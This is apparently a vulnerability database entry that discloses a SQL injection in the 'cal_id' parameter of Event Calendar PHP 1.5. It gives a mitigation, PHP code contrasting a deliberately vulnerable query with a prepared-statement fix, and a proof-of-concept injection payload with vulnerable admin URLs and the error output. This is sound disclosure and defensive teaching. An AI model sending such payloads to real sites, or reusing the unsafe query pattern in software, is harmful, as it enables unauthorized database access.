Vendor: Event Calendar PHP
By: Ashiyane Digital Security Team
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Event Calendar PHP
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:eventcalendarphp:event_calendar_php:1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WebApp - PHP
Year: 2016

Event Calendar PHP 1.5 – SQL Injection

A SQL injection vulnerability exists in Event Calendar PHP 1.5. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'cal_id' parameter of the vulnerable URL. An attacker can exploit this vulnerability to access or modify the data in the back-end database.

Mitigation:

Input validation and parameterized (prepared) queries should be used so that a user-supplied value such as cal_id is never interpolated into the SQL text; this prevents SQL injection attacks.
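As an added illustration, not code from the advisory or from the Event Calendar PHP code base, the following PHP shows the string-concatenated query pattern that produces the kind of error quoted in the Exploit-DB data on this page beside a hardened version using a PDO prepared statement. The table name pa_ecal_calendars is taken from that error message; the PDO connection and the assumption that cal_id is a positive integer are mine.

```php
<?php
// Added example; not Event Calendar PHP's own code. Assumes a PDO connection
// to the MySQL database and that cal_id is a positive integer identifier.

// Vulnerable pattern: the raw GET value is spliced into the SQL text, so an
// input such as 1' order by 20-- becomes part of the statement itself. This
// is the pattern behind the "query error: SELECT * FROM pa_ecal_calendars
// WHERE cal_id='1' order by 20-- '" message in the advisory.
function findCalendarUnsafe(PDO $db, string $calId): ?array
{
    $sql = "SELECT * FROM pa_ecal_calendars WHERE cal_id='" . $calId . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: validate the type first, then bind the value as a
// parameter so the database never interprets it as SQL.
function findCalendarSafe(PDO $db, string $calId): ?array
{
    // Reject anything that is not a plain positive integer before it reaches SQL.
    $id = filter_var($calId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM pa_ecal_calendars WHERE cal_id = :cal_id');
    $stmt->bindValue(':cal_id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage, assuming $db is an existing PDO connection. Disabling emulated
// prepares makes MySQL itself perform the binding rather than the driver.
// $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
// $calendar = findCalendarSafe($db, $_GET['cal_id'] ?? '');
```

With the hardened function, the '+order+by+20--+ input from the advisory is rejected at the filter_var check and never reaches the database.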

Exploit-DB raw data:

=====================================================
# Event Calendar PHP 1.5 - SQL Injection
=====================================================
# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Version: 1.5
# Platform: WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://localhost/eventcalendar/admin.php?act=options&cal_id=[payload]
http://localhost/eventcalendar/admin.php?act=cal_options&cal_id=[payload]
http://localhost/eventcalendar/admin.php?act=cal_language&cal_id=[payload]
Vulnerable parameter: cal_id
Method: GET

A simple injection:
Payload: '+order+by+20--+
http://localhost/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+

In the response you can see the result:
query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by
20-- '. Error: Unknown column '20' in 'order clause'

Result of payload: Error: Unknown column '20' in 'order clause'
=====================================================
# Discovered By: Ehsan Hosseini
=====================================================